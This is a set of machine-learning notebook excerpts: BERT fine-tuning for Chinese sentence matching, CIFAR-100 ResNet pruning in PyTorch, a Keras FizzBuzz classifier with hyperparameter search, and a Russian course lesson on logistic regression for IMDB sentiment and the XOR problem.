                text2 = text2[:_max_len]
            text1 = list(text1)
            text2 = list(text2)
            text = ['[CLS]'] + text1 + ['[SEP]'] + text2 + ['[SEP]']
            seg = [0] + [0] * len(text1) + [0] + [1] * len(text2) + [1]
            text = tokenizer.convert_tokens_to_ids(text)
            yield ((text, seg), int(label))


def get_datasets(params):
    """Build the shuffled/padded training set plus both padded test sets."""
    _shapes = (([None], [None]), ())
    _types = ((tf.int32, tf.int32), tf.int32)
    _pads = ((0, 0), -1)  # pad ids/segments with 0; labels padded with -1

    ds_train = tf.data.Dataset.from_generator(
        lambda: joint_data_gen(),
        output_shapes = _shapes,
        output_types = _types,)
    ds_train = ds_train.shuffle(params['buffer_size'])
    ds_train = ds_train.padded_batch(params['batch_size'], _shapes, _pads)
    ds_train = ds_train.prefetch(tf.data.experimental.AUTOTUNE)

    ds_test_js = tf.data.Dataset.from_generator(
        lambda: data_gen_js(),
        output_shapes = _shapes,
        output_types = _types,)
    ds_test_js = ds_test_js.padded_batch(params['batch_size'], _shapes, _pads)
    ds_test_js = ds_test_js.prefetch(tf.data.experimental.AUTOTUNE)

    ds_test_cs = tf.data.Dataset.from_generator(
        lambda: data_gen_cs(),
        output_shapes = _shapes,
        output_types = _types,)
    ds_test_cs = ds_test_cs.padded_batch(params['batch_size'], _shapes, _pads)
    ds_test_cs = ds_test_cs.prefetch(tf.data.experimental.AUTOTUNE)

    return ds_train, ds_test_js, ds_test_cs


# input stream ids check
(text, seg), _ = next(joint_data_gen())
print(text)
print(seg)


class BertFinetune(tf.keras.Model):
    """BERT encoder + small MLP head producing a single matching logit."""

    def __init__(self, params):
        super(BertFinetune, self).__init__()
        self.bert = TFBertModel.from_pretrained(params['pretrain_path'],
                                                trainable = True)
        # Warm-start from further-pretrained weights; skip_mismatch tolerates
        # layers absent from the checkpoint.
        self.bert.load_weights('../model/bert_further_pretrain.h5',
                               by_name = True,
                               skip_mismatch = True)
        self.drop_1 = tf.keras.layers.Dropout(.1)
        self.fc = tf.keras.layers.Dense(300, tf.nn.swish, name='down_stream/fc')
        self.drop_2 = tf.keras.layers.Dropout(.1)
        self.out = tf.keras.layers.Dense(1, name='down_stream/out')

    def call(self, bert_inputs, training):
        """bert_inputs: [token_ids, attention_mask, segment_ids] -> (batch,) logits."""
        bert_inputs = [tf.cast(inp, tf.int32) for inp in bert_inputs]
        x = self.bert(bert_inputs, training=training)
        x = x[1]  # pooled [CLS] output (second element of the BERT outputs)
        x = self.drop_1(x, training=training)
        x = self.fc(x)
        x = self.drop_2(x, training=training)
        x = self.out(x)
        x = tf.squeeze(x, 1)  # (batch, 1) -> (batch,)
        return x


model = BertFinetune(params)
model.build([[None, None], [None, None], [None, None]])
print(model.weights[5])


def label_smoothing(label, smooth):
    """Pull 0/1 labels toward 0.5 by `smooth`; no-op when smooth == 0."""
    if smooth > 0.:
        return label * (1 - smooth) + 0.5 * smooth
    else:
        return label


# Cyclical LR schedule; the optimizer's lr is overwritten from this schedule
# on every training step below.
decay_lr = tfa.optimizers.Triangular2CyclicalLearningRate(
    initial_learning_rate = params['init_lr'],
    maximal_learning_rate = params['max_lr'],
    step_size = 2 * params['buffer_size'] // params['batch_size'],)
optim = tf.optimizers.Adam(params['init_lr'])

global_step = 0
best_acc, best_acc1, best_acc2 = .0, .0, .0
count = 0  # epochs without improvement (early stopping counter)
t0 = time.time()
logger = logging.getLogger('tensorflow')
logger.setLevel(logging.INFO)

for _ in range(params['n_epochs']):
    ds_train, ds_test_js, ds_test_cs = get_datasets(params)

    # TRAINING
    for ((text, seg), labels) in ds_train:
        with tf.GradientTape() as tape:
            # tf.sign(text) doubles as the attention mask (non-zero ids -> 1).
            logits = model([text, tf.sign(text), seg], training=True)
            labels = tf.cast(labels, tf.float32)
            # Re-weight positives per batch to counter class imbalance.
            num_neg = tf.reduce_sum(tf.cast(tf.equal(labels, 0.), tf.float32)).numpy()
            num_pos = tf.reduce_sum(labels).numpy()
            if num_pos == 0.:
                pos_weight = 1.
            else:
                pos_weight = num_neg / num_pos
            loss = tf.reduce_mean(tf.nn.weighted_cross_entropy_with_logits(
                labels = label_smoothing(labels, params['label_smooth']),
                logits = logits,
                pos_weight = pos_weight))
        optim.lr.assign(decay_lr(global_step))
        grads = tape.gradient(loss, model.trainable_variables)
        grads, _ = tf.clip_by_global_norm(grads, params['clip_norm'])
        optim.apply_gradients(zip(grads, model.trainable_variables))
        if global_step % 100 == 0:
            logger.info("Step {} | Loss: {:.4f} | Spent: {:.1f} secs | LR: {:.6f}".format(
                global_step, loss.numpy().item(), time.time()-t0, optim.lr.numpy().item()))
            t0 = time.time()
        global_step += 1

    # EVALUATION 1 (CSV corpus test set)
    m = tf.keras.metrics.Accuracy()
    intent_true = []
    intent_pred = []
    for ((text, seg), labels) in ds_test_cs:
        logits = tf.sigmoid(model([text, tf.sign(text), seg], training=False))
        y_pred = tf.cast(tf.math.greater_equal(logits, .5), tf.int32)
        m.update_state(y_true=labels, y_pred=y_pred)
        intent_true += labels.numpy().flatten().tolist()
        intent_pred += y_pred.numpy().flatten().tolist()
    acc_1 = m.result().numpy()
    logger.info('测试集:微众银行智能客服')
    logger.info("Evaluation: Testing Accuracy: {:.3f}".format(acc_1))
    logger.info('\n'+classification_report(y_true = intent_true,
                                           y_pred = intent_pred,
                                           labels = [0, 1],
                                           target_names = ['Not Matched', 'Matched'],
                                           digits = 3))

    # EVALUATION 2 (JSON corpus dev set)
    m = tf.keras.metrics.Accuracy()
    intent_true = []
    intent_pred = []
    for ((text, seg), labels) in ds_test_js:
        logits = tf.sigmoid(model([text, tf.sign(text), seg], training=False))
        y_pred = tf.cast(tf.math.greater_equal(logits, .5), tf.int32)
        m.update_state(y_true=labels, y_pred=y_pred)
        intent_true += labels.numpy().flatten().tolist()
        intent_pred += y_pred.numpy().flatten().tolist()
    acc_2 = m.result().numpy()
    logger.info('测试集:蚂蚁金融语义相似度')
    logger.info("Evaluation: Testing Accuracy: {:.3f}".format(acc_2))
    logger.info('\n'+classification_report(y_true = intent_true,
                                           y_pred = intent_pred,
                                           labels = [0, 1],
                                           target_names = ['Not Matched', 'Matched'],
                                           digits = 3))

    # Define Where To Save Model and Stop Training
    # Selection metric is the mean of both test accuracies.
    acc = (acc_1 + acc_2) / 2.
    if acc > best_acc:
        best_acc = acc
        best_acc1 = acc_1
        best_acc2 = acc_2
        # you can save model here
        count = 0
    else:
        count += 1
    logger.info("Best | Accuracy 1: {:.3f} | Accuracy 2: {:.3f}".format(best_acc1, best_acc2))
    if count == params['num_patience']:
        print(params['num_patience'], "times not improve the best result, therefore stop training")
        break
```
github_jupyter
``` from pytorchcv.model_provider import get_model as ptcv_get_model import torch import torch.nn.utils.prune as prune import torch.nn as nn import torch.nn.functional as F from torch.autograd import Variable device = torch.device('cuda' if torch.cuda.is_available() else 'cpu') net = ptcv_get_model("resnet20_cifar100", pretrained=True) net = net.to(device) import torchvision import torchvision.transforms as transforms transform = transforms.Compose( [transforms.ToTensor(), transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))]) trainset = torchvision.datasets.CIFAR100(root='./data', train=True, download=True, transform=transform) trainloader = torch.utils.data.DataLoader(trainset, batch_size=20, shuffle=True, num_workers=2) testset = torchvision.datasets.CIFAR100(root='./data', train=False, download=True, transform=transform) testloader = torch.utils.data.DataLoader(testset, batch_size=4, shuffle=False, num_workers=2) classes = ("beaver", "dolphin", "otter", "seal", "whale", "aquarium fish", "flatfish", "ray", "shark", "trout", "orchids", \ "poppies", "roses", "sunflowers", "tulips", "bottles", "bowls", "cans", "cups", "plates", "apples", "mushrooms", \ "oranges", "pears", "sweet peppers", "clock", "computer keyboard", "lamp", "telephone", "television", "bed", \ "chair", "couch", "table", "wardrobe", "bee", "beetle", "butterfly", "caterpillar", "cockroach", "bear", "leopard", \ "lion", "tiger", "wolf", "bridge", "castle", "house", "road", "skyscraper", "cloud", "forest", "mountain", "plain", "sea", \ "camel", "cattle", "chimpanzee", "elephant", "kangaroo", "fox", "porcupine", "possum", "raccoon", "skunk", "crab", \ "lobster", "snail", "spider", "worm", "baby", "boy", "girl", "man", "woman", "crocodile", "dinosaur", "lizard", "snake",\ "turtle", "hamster", "mouse", "rabbit", "shrew", "squirrel", "maple", "oak", "palm", "pine", "willow", "bicycle", "bus",\ "motorcycle", "pickup truck", "train", "lawn-mower", "rocket", "streetcar", "tank", "tractor") import 
matplotlib.pyplot as plt import numpy as np # functions to show an image def imshow(img): img = img / 2 + 0.5 # unnormalize npimg = img.numpy() plt.imshow(np.transpose(npimg, (1, 2, 0))) plt.show() # get some random training images dataiter = iter(trainloader) images, labels = dataiter.next() # show images imshow(torchvision.utils.make_grid(images)) # print labels print(' '.join('%5s' % classes[labels[j]] for j in range(4))) parameters_to_prune = ( (net.features.init_block.conv, "weight"), (net.features.stage1.unit1.body.conv1.conv, "weight"), (net.features.stage1.unit1.body.conv2.conv, "weight"), (net.features.stage1.unit2.body.conv1.conv, "weight"), (net.features.stage1.unit2.body.conv2.conv, "weight"), (net.features.stage1.unit3.body.conv1.conv, "weight"), (net.features.stage1.unit3.body.conv2.conv, "weight"), (net.features.stage2.unit1.body.conv1.conv, "weight"), (net.features.stage2.unit1.body.conv2.conv, "weight"), (net.features.stage2.unit1.identity_conv.conv, "weight"), (net.features.stage2.unit2.body.conv1.conv, "weight"), (net.features.stage2.unit2.body.conv2.conv, "weight"), (net.features.stage2.unit3.body.conv1.conv, "weight"), (net.features.stage2.unit3.body.conv2.conv, "weight"), (net.features.stage3.unit1.body.conv1.conv, "weight"), (net.features.stage3.unit1.body.conv2.conv, "weight"), (net.features.stage3.unit1.identity_conv.conv, "weight"), (net.features.stage3.unit2.body.conv1.conv, "weight"), (net.features.stage3.unit2.body.conv2.conv, "weight"), (net.features.stage3.unit3.body.conv1.conv, "weight"), (net.features.stage3.unit3.body.conv2.conv, "weight"), (net.output, "weight") ) import torch.optim as optim criterion = nn.CrossEntropyLoss() optimizer = optim.SGD(net.parameters(), lr=0.001, momentum=0.8, weight_decay=1e-4) def test(): correct = 0 total = 0 with torch.no_grad(): for i, data in enumerate(testloader, 0): if i > 25: break images, labels = data[0].to(device), data[1].to(device) outputs = net(images) _, predicted = 
torch.max(outputs.data, 1) total += labels.size(0) correct += (predicted == labels).sum().item() print('Accuracy of the network on 100 test images: %d %%' % ( 100 * correct / total)) n_prune = 10 for p in range(n_prune): test() print("prune") prune.global_unstructured( parameters_to_prune, pruning_method=prune.L1Unstructured, amount=0.2, ) test() for i, data in enumerate(trainloader, 0): # get the inputs; data is a list of [inputs, labels] inputs, labels = data[0].to(device), data[1].to(device) # zero the parameter gradients optimizer.zero_grad() # forward + backward + optimize outputs = net(inputs) loss = criterion(outputs, labels) loss.backward() optimizer.step() # print statistics if i % 500 == 0: test() optimizer = optim.SGD(net.parameters(), lr=0.0005) n_epoch = 5 for p in range(n_epoch): for i, data in enumerate(trainloader, 0): # get the inputs; data is a list of [inputs, labels] inputs, labels = data[0].to(device), data[1].to(device) # zero the parameter gradients optimizer.zero_grad() # forward + backward + optimize outputs = net(inputs) loss = criterion(outputs, labels) loss.backward() optimizer.step() # print statistics if i % 500 == 0: test() if True: correct = 0 total = 0 with torch.no_grad(): for i, data in enumerate(testloader, 0): images, labels = data[0].to(device), data[1].to(device) outputs = net(images) _, predicted = torch.max(outputs.data, 1) total += labels.size(0) correct += (predicted == labels).sum().item() print('Accuracy of the network on 10000 test images: %d %%' % ( 100 * correct / total)) for (p, _) in parameters_to_prune: print(torch.sum(p.weight_mask).item(), " / ", torch.sum(1*p.weight_mask >= 0).item()) ```
github_jupyter
### requirements / ToDo [x] train/test accuracy total + Fizz/Buzz/FizzBuzz separately [x] graphs for different hyperparameter options (do graphs) [x] try different learning algorithms [ ] include best setting in report [x] add main.py that creates output.csv ## Logic Based FizzBuzz Function [Software 1.0] ``` !pip install tqdm hyperopt import numpy as np import pandas as pd import matplotlib.pyplot as plt from tensorflow import set_random_seed %matplotlib inline set_random_seed(574) np.random.seed(574) def fizzbuzz(n): # Logic Explanation if n % 3 == 0 and n % 5 == 0: return 'fizzbuzz' elif n % 3 == 0: return 'fizz' elif n % 5 == 0: return 'buzz' else: return 'other' ``` ## Create Training and Testing Datasets in CSV Format ``` def createInputCSV(start,end,filename): # Why list in Python? inputData = [] outputData = [] # Why do we need training Data? for i in range(start,end): inputData.append(i) outputData.append(fizzbuzz(i)) # Why Dataframe? dataset = {} dataset["input"] = inputData dataset["label"] = outputData # Writing to csv pd.DataFrame(dataset).to_csv(filename, index=False) print(filename, "Created!") ``` ## Processing Input and Label Data ``` def processData(dataset): # Why do we have to process? data = dataset['input'].values labels = dataset['label'].values processedData = encodeData(data) processedLabel = encodeLabel(labels) return processedData, processedLabel def encodeData(data): processedData = [] for dataInstance in data: # Why do we have number 10? 
# to encode digits from 1 to 1000 processedData.append([dataInstance >> d & 1 for d in range(10)]) return np.array(processedData) from keras.utils import np_utils def encodeLabel(labels): processedLabel = [] for labelInstance in labels: if(labelInstance == "fizzbuzz"): # Fizzbuzz processedLabel.append([3]) elif(labelInstance == "fizz"): # Fizz processedLabel.append([1]) elif(labelInstance == "buzz"): # Buzz processedLabel.append([2]) else: # Other processedLabel.append([0]) return np_utils.to_categorical(np.array(processedLabel),4) ``` ## Model Definition ``` from keras.models import Sequential from keras.layers import Dense, Activation, Dropout from keras.callbacks import EarlyStopping from keras.optimizers import RMSprop, SGD, Adam, Nadam optimizers = { 'SGD': SGD, 'RMSprop': RMSprop, 'Adam': Adam, 'Nadam': Nadam } input_size = 10 output_size = 4 def get_model(params, verbose=False, optim_algo='RMSprop'): # Why do we need a model? # For it to learn the mapping from input to output # Why use Dense layer and then activation? # Dense layers contain the model coeficients that perform linear transformations on the input data # Activations are needed to introduce nonliniarities (composition of multiple linear transformation is just another linear transformation) # Why use sequential model with layers? # Because there is no need to use functional API as we have a linear computation graph assert len(params['hidden_layer_nodes']) == params['num_hidden'], "specify layer size for each hidden layer" model = Sequential() model.add(Dense(params['hidden_layer_nodes'][0], input_dim=input_size)) model.add(Activation(params['activation'])) # Why dropout? 
# to avoid overfitting (avoiding nodes that don't compute anything useful) model.add(Dropout(params['drop_out'])) for i in range(1,params['num_hidden']): model.add(Dense(params['hidden_layer_nodes'][i])) model.add(Activation(params['activation'])) model.add(Dropout(params['drop_out'])) model.add(Dense(output_size)) model.add(Activation('softmax')) # Why Softmax? # to get probabilistic output if verbose: model.summary() # Why use categorical_crossentropy? # because it's differentiable generalization of logloss that works for n-dimensional probabilistic outputs optimizer = optimizers[optim_algo](lr = params['learning_rate']) model.compile(optimizer=optimizer, loss='categorical_crossentropy', metrics=['accuracy']) return model ``` # <font color='blue'>Creating Training and Testing Datafiles</font> ``` # Create datafiles createInputCSV(101,1001,'training.csv') createInputCSV(1,101,'testing.csv') ``` # <font color='blue'>Creating Model</font> ``` hyper_params = { 'drop_out': 0.339, 'hidden_layer_nodes': [245, 154, 67], 'num_hidden': 3, 'activation': 'selu', 'learning_rate': 0.00815 } model = get_model(hyper_params, optim_algo='SGD') ``` # <font color = blue>Run Model</font> ``` validation_data_split = 0.2 num_epochs = 1000 model_batch_size = 128 early_patience = 100 earlystopping_cb = EarlyStopping(monitor='val_loss', verbose=0, patience=early_patience, mode='min') # Read Dataset dataset = pd.read_csv('training.csv') # Process Dataset processedData, processedLabel = processData(dataset) history = model.fit(processedData , processedLabel , validation_split=validation_data_split , epochs=num_epochs , batch_size=model_batch_size , callbacks = [earlystopping_cb] ) from hyperopt import hp, STATUS_OK, tpe, fmin, Trials from hyperopt.pyll.stochastic import sample from sklearn.metrics import confusion_matrix ITERATION = 0 def hypp_search_objective(hypp): global ITERATION ITERATION += 1 hypp.update(hypp.pop('num_hidden')) hypp['hidden_layer_nodes'] = [int(x) for x in 
hypp['hidden_layer_nodes']] model = get_model(hypp) history = model.fit(processedData , processedLabel , validation_split = validation_data_split , epochs = num_epochs , batch_size = model_batch_size , callbacks = [earlystopping_cb] , verbose = False ) best_acc = np.max(history.history['val_acc']) train_acc = np.max(history.history['acc']) loss = 1 - best_acc return {'loss': loss, 'best_acc': best_acc, 'train_acc': train_acc, 'params': hypp, 'iteration': ITERATION, 'status': STATUS_OK} def class_accuracy(pred_score, y_true): CM = confusion_matrix( np.argmax(y_true,axis=1), np.argmax(pred_score,axis=1) ) return np.diagonal(CM / CM.sum(axis=1)) def model_test(model,data): hist = model.fit(data['X_tr'], data['y_tr'], validation_split = 0.2, epochs = num_epochs, batch_size = model_batch_size, callbacks = [earlystopping_cb], verbose = False) pred_train = model.predict(data['X_tr']) pred_test = model.predict(data['X_ts']) return { 'train': class_accuracy(data['y_tr'], pred_train), 'test': class_accuracy(data['y_ts'], pred_test), 'hist': hist } ``` ### domain space ``` space = { 'activation': hp.choice('activation', ['tanh', 'relu', 'elu', 'selu']), 'num_hidden': hp.choice('num_hidden', [{'num_hidden': 1, 'hidden_layer_nodes': [hp.qnormal('hidden_11_size', 256, 10, 1)]}, {'num_hidden': 2, 'hidden_layer_nodes': [hp.qnormal('hidden_12_size', 256, 10, 1), hp.qnormal('hidden_22_size', 128, 10, 1)]}, {'num_hidden': 3, 'hidden_layer_nodes': [hp.qnormal('hidden_13_size', 256, 10, 1), hp.qnormal('hidden_23_size', 128, 10, 1), hp.qnormal('hidden_2_size', 64, 5, 1)]}]), 'drop_out': hp.uniform('drop_out', 0.0, 0.9), 'learning_rate': hp.loguniform('learning_rate', np.log(0.001), np.log(0.1)) #more frequent sampling for smaller values } bayes_trials = Trials() best = fmin(fn = hypp_search_objective, space = space, algo = tpe.suggest, max_evals = 5, trials = bayes_trials, rstate = np.random.RandomState(573)) max(bayes_trials.trials, key=lambda x: x['result']['best_acc']) ``` ### using 
Google Colaboratory found that ``` { 'drop_out': 0.339, 'hidden_layer_nodes': [245, 154, 67], 'num_hidden': 3, 'activation': 'tanh', 'learning_rate': 0.00815 }``` is the best option ### how train and test scores depend on Dropout and learning algorithm ``` params = { 'hidden_layer_nodes': [245, 154, 67], 'num_hidden': 3, 'activation': 'tanh', 'learning_rate': 0.00815, 'drop_out': 0.339 } data_train = pd.read_csv('./training.csv') data_test = pd.read_csv('./testing.csv') X_tr, y_tr = processData(data_train) X_ts, y_ts = processData(data_test) data = { 'X_tr': X_tr, 'X_ts': X_ts, 'y_tr': y_tr, 'y_ts': y_ts } model = get_model(params) model.save_weights('./init_weights.hdf5') from tqdm import tqdm_notebook as tqdm dropout_test = [] params_wo_dropout = params.copy() del params_wo_dropout['drop_out'] for dropout in tqdm(np.linspace(0,0.9,num=20)): model = get_model(dict({'drop_out': dropout}, **params_wo_dropout)) model.load_weights('./init_weights.hdf5') dropout_test.append( model_test(model, data) ) dropout_test = { 'test': np.r_[[x['test'] for x in dropout_test]], 'train': np.r_[[x['train'] for x in dropout_test]] } cols = ['other', 'fizz', 'buzz', 'fizzbuzz'] index = np.linspace(0,1,20) do_train = pd.DataFrame(dropout_test['train'],columns=cols, index=index).fillna(0) do_test = pd.DataFrame(dropout_test['test'],columns=cols, index=index).fillna(0) f,ax = plt.subplots(1,4,figsize=(15,3)) for i,c in enumerate(cols): ax[i].set_title(c) do_train[c].plot(label='train', ax=ax[i]) do_test[c].plot(label='test', ax=ax[i]) ax[i].legend() algo_test = [] for algo in tqdm(['SGD','RMSprop','Adam','Nadam']): model = get_model(params, optim_algo=algo) model.load_weights('./init_weights.hdf5') algo_test.append( model_test(model, data) ) algo_test = { 'test': np.r_[[x['test'] for x in algo_test]], 'train': np.r_[[x['train'] for x in algo_test]], 'epochs_train': np.r_[[len(x['hist'].history['acc']) for x in algo_test]] } cols = ['other', 'fizz', 'buzz', 'fizzbuzz'] index = 
['SGD','RMSprop','Adam','Nadam'] algo_train = pd.DataFrame(algo_test['train'],columns=cols, index=index).fillna(0) algo_train['n_epochs'] = algo_test['epochs_train'] algo_test = pd.DataFrame(algo_test['test'],columns=cols, index=index).fillna(0) algo_test.columns = [x+'_test' for x in algo_test.columns] algo_train.drop('n_epochs',axis=1).mean(axis=1) algo_test.mean(axis=1) pd.concat([algo_test,algo_train],axis=1) ``` ### testing lower learning rate for SGD ``` params params_lr = params.copy() params_lr['learning_rate'] = 1e-2 model = get_model(params_lr, optim_algo='SGD') model.load_weights('./init_weights.hdf5') res = model_test(model, data) ``` # <font color = blue>Training and Validation Graphs</font> ``` df = pd.DataFrame(history.history) df.plot(subplots=True, grid=True, figsize=(10,15)) ``` # <font color = blue>Testing Accuracy [Software 2.0]</font> ``` def decodeLabel(encodedLabel): if encodedLabel == 0: return "other" elif encodedLabel == 1: return "fizz" elif encodedLabel == 2: return "buzz" elif encodedLabel == 3: return "fizzbuzz" model = get_model(params) model_test(model, data) wrong = 0 right = 0 testData = pd.read_csv('testing.csv') processedTestData = encodeData(testData['input'].values) processedTestLabel = encodeLabel(testData['label'].values) predictedTestLabel = [] for i,j in zip(processedTestData,processedTestLabel): y = model.predict(np.array(i).reshape(-1,10)) predictedTestLabel.append(decodeLabel(y.argmax())) if j.argmax() == y.argmax(): right = right + 1 else: wrong = wrong + 1 print("Errors: " + str(wrong), " Correct :" + str(right)) print("Testing Accuracy: " + str(right/(right+wrong)*100)) output = {} output["input"] = testData['input'] output["label"] = testData['label'] output["predicted_label"] = predictedTestLabel opdf = pd.DataFrame(output) opdf.to_csv('output.csv') ```
github_jupyter
<center>
<img src="../../img/ods_stickers.jpg">
## Открытый курс по машинному обучению
</center>
Автор материала: программист-исследователь Mail.ru Group, старший преподаватель Факультета Компьютерных Наук ВШЭ Юрий Кашницкий. Материал распространяется на условиях лицензии [Creative Commons CC BY-NC-SA 4.0](https://creativecommons.org/licenses/by-nc-sa/4.0/). Можно использовать в любых целях (редактировать, поправлять и брать за основу), кроме коммерческих, но с обязательным упоминанием автора материала.

# <center>Тема 4. Линейные модели классификации и регрессии
## <center>Часть 4. Где логистическая регрессия хороша и где не очень

### Анализ отзывов IMDB к фильмам

Будем решать задачу бинарной классификации отзывов IMDB к фильмам. Имеется обучающая выборка с размеченными отзывами, по 12500 отзывов известно, что они хорошие, еще про 12500 – что они плохие. Здесь уже не так просто сразу приступить к машинному обучению, потому что готовой матрицы $X$ нет – ее надо приготовить. Будем использовать самый простой подход – мешок слов ("Bag of words"). При таком подходе признаками отзыва будут индикаторы наличия в нем каждого слова из всего корпуса, где корпус – это множество всех отзывов. Идея иллюстрируется картинкой

<img src="../../img/bag_of_words.svg" width=80%>

```
from __future__ import division, print_function
# Silence all Anaconda warnings.
import warnings
warnings.filterwarnings('ignore')
import numpy as np
import matplotlib.pyplot as plt
%matplotlib inline
import seaborn as sns
import numpy as np
from sklearn.datasets import load_files
from sklearn.feature_extraction.text import CountVectorizer, TfidfTransformer, TfidfVectorizer
from sklearn.linear_model import LogisticRegression
from sklearn.svm import LinearSVC
```

**Загрузим данные [отсюда](http://ai.stanford.edu/~amaas/data/sentiment/aclImdb_v1.tar.gz) (это прямая ссылка на скачивание, а [вот](http://ai.stanford.edu/~amaas/data/sentiment/) описание набора данных). В обучающей и тестовой выборках по 12500 тысяч хороших и плохих отзывов к фильмам.**

```
# Change the path to the file for your machine.
reviews_train = load_files("/Users/y.kashnitsky/Yandex.Disk.localized/ML/data/aclImdb/train")
text_train, y_train = reviews_train.data, reviews_train.target

print("Number of documents in training data: %d" % len(text_train))
print(np.bincount(y_train))

# Change the path to the file for your machine.
reviews_test = load_files("/Users/y.kashnitsky/Yandex.Disk.localized/ML/data/aclImdb/test")
text_test, y_test = reviews_test.data, reviews_test.target
print("Number of documents in test data: %d" % len(text_test))
print(np.bincount(y_test))
```

**Пример отзыва и соответствующей метки.**

```
print(text_train[1])

y_train[1]  # a negative review

text_train[2]

y_train[2]  # a positive review
```

## Простой подсчет слов

**Составим словарь всех слов с помощью CountVectorizer.**

```
cv = CountVectorizer()
cv.fit(text_train)

len(cv.vocabulary_)
```

**Посмотрим на примеры полученных "слов" (лучше их называть токенами). Видим, что многие важные этапы обработки текста мы тут пропустили.**

```
print(cv.get_feature_names()[:50])

print(cv.get_feature_names()[50000:50050])
```

**Закодируем предложения из текстов обучающей выборки индексами входящих слов. Используем разреженный формат.**

```
X_train = cv.transform(text_train)
X_train
```

**Посмотрим, как преобразование подействовало на одно из предложений.**

```
print(text_train[19726])

X_train[19726].nonzero()[1]

X_train[19726].nonzero()
```

**Преобразуем так же тестовую выборку.**

```
X_test = cv.transform(text_test)
```

**Обучим логистическую регрессию.**

```
%%time
logit = LogisticRegression(n_jobs=-1, random_state=7)
logit.fit(X_train, y_train)
```

**Посмотрим на доли правильных ответов на обучающей и тестовой выборках.**

```
round(logit.score(X_train, y_train), 3), round(logit.score(X_test, y_test), 3),
```

**Коэффициенты модели можно красиво отобразить.**

```
def visualize_coefficients(classifier, feature_names, n_top_features=25):
    """Bar-plot the n_top largest positive and negative model coefficients."""
    # get coefficients with large absolute values
    coef = classifier.coef_.ravel()
    positive_coefficients = np.argsort(coef)[-n_top_features:]
    negative_coefficients = np.argsort(coef)[:n_top_features]
    interesting_coefficients = np.hstack([negative_coefficients, positive_coefficients])
    # plot them
    plt.figure(figsize=(15, 5))
    colors = ["red" if c < 0 else "blue" for c in coef[interesting_coefficients]]
    plt.bar(np.arange(2 * n_top_features), coef[interesting_coefficients], color=colors)
    feature_names = np.array(feature_names)
    plt.xticks(np.arange(1, 1 + 2 * n_top_features),
               feature_names[interesting_coefficients], rotation=60, ha="right");


def plot_grid_scores(grid, param_name):
    """Plot mean train/test CV scores of a fitted GridSearchCV versus one parameter."""
    # NOTE(review): 'mean_train_score' is only present when GridSearchCV is
    # created with return_train_score=True on newer sklearn — confirm version.
    plt.plot(grid.param_grid[param_name], grid.cv_results_['mean_train_score'],
             color='green', label='train')
    plt.plot(grid.param_grid[param_name], grid.cv_results_['mean_test_score'],
             color='red', label='test')
    plt.legend();


visualize_coefficients(logit, cv.get_feature_names())
```

**Подберем коэффициент регуляризации для логистической регрессии. Используем `sklearn.pipeline`, поскольку `CountVectorizer` правильно применять только на тех данных, на которых в текущий момент обучается модель (чтоб не "подсматривать" в тестовую выборку и не считать по ней частоты вхождения слов). В данном случае `pipeline` задает последовательность действий: применить `CountVectorizer`, затем обучить логистическую регрессию.**

```
%%time
from sklearn.pipeline import make_pipeline

text_pipe_logit = make_pipeline(CountVectorizer(),
                                LogisticRegression(n_jobs=-1, random_state=7))
text_pipe_logit.fit(text_train, y_train)
print(text_pipe_logit.score(text_test, y_test))

%%time
from sklearn.model_selection import GridSearchCV

param_grid_logit = {'logisticregression__C': np.logspace(-5, 0, 6)}
grid_logit = GridSearchCV(text_pipe_logit, param_grid_logit, cv=3, n_jobs=-1)

grid_logit.fit(text_train, y_train)
```

**Лучшее значение C и соответствующее качество на кросс-валидации:**

```
grid_logit.best_params_, grid_logit.best_score_

plot_grid_scores(grid_logit, 'logisticregression__C')
```

На валидационной выборке:

```
grid_logit.score(text_test, y_test)
```

**Теперь то же самое, но со случайным лесом. Видим, что с логистической регрессией мы достигаем большей доли правильных ответов меньшими усилиями**

```
from sklearn.ensemble import RandomForestClassifier

forest = RandomForestClassifier(n_estimators=200, n_jobs=-1, random_state=17)

%%time
forest.fit(X_train, y_train)

round(forest.score(X_test, y_test), 3)
```

### XOR-проблема

Теперь рассмотрим пример, где линейные модели справляются хуже.

Линейные методы классификации строят все же очень простую разделяющую поверхность – гиперплоскость. Самый известный игрушечный пример, в котором классы нельзя без ошибок поделить гиперплоскостью (то есть прямой, если это 2D), получил имя "the XOR problem".

XOR – это "исключающее ИЛИ", булева функция со следующей таблицей истинности:

<img src='../../img/XOR_table.gif'>

XOR дал имя простой задаче бинарной классификации, в которой классы представлены вытянутыми по диагоналям и пересекающимися облаками точек.

```
# Generate the data.
rng = np.random.RandomState(0)
X = rng.randn(200, 2)
y = np.logical_xor(X[:, 0] > 0, X[:, 1] > 0)

plt.scatter(X[:, 0], X[:, 1], s=30, c=y, cmap=plt.cm.Paired);
```

Очевидно, нельзя провести прямую так, чтобы без ошибок отделить один класс от другого. Поэтому логистическая регрессия плохо справляется с такой задачей.

```
def plot_boundary(clf, X, y, plot_title):
    """Fit clf on (X, y) and draw its class-1 probability surface over a 2D grid."""
    xx, yy = np.meshgrid(np.linspace(-3, 3, 50),
                         np.linspace(-3, 3, 50))
    clf.fit(X, y)
    # plot the decision function for each datapoint on the grid
    Z = clf.predict_proba(np.vstack((xx.ravel(), yy.ravel())).T)[:, 1]
    Z = Z.reshape(xx.shape)

    image = plt.imshow(Z, interpolation='nearest',
                       extent=(xx.min(), xx.max(), yy.min(), yy.max()),
                       aspect='auto', origin='lower', cmap=plt.cm.PuOr_r)
    # NOTE(review): 'linetypes' is not a valid contour kwarg ('linestyles'
    # was likely intended); recent matplotlib raises on unknown kwargs.
    contours = plt.contour(xx, yy, Z, levels=[0], linewidths=2,
                           linetypes='--')
    plt.scatter(X[:, 0], X[:, 1], s=30, c=y, cmap=plt.cm.Paired)
    plt.xticks(())
    plt.yticks(())
    plt.xlabel(r'$x_1$')
    plt.ylabel(r'$x_2$')
    plt.axis([-3, 3, -3, 3])
    plt.colorbar(image)
    plt.title(plot_title, fontsize=12);


plot_boundary(LogisticRegression(), X, y, "Logistic Regression, XOR problem")
```

А вот если на вход подать полиномиальные признаки, в данном случае до 2 степени, то проблема решается.

```
from sklearn.preprocessing import PolynomialFeatures
from sklearn.pipeline import Pipeline

logit_pipe = Pipeline([('poly', PolynomialFeatures(degree=2)),
                       ('logit', LogisticRegression())])

plot_boundary(logit_pipe, X, y, "Logistic Regression + quadratic features. XOR problem")
```

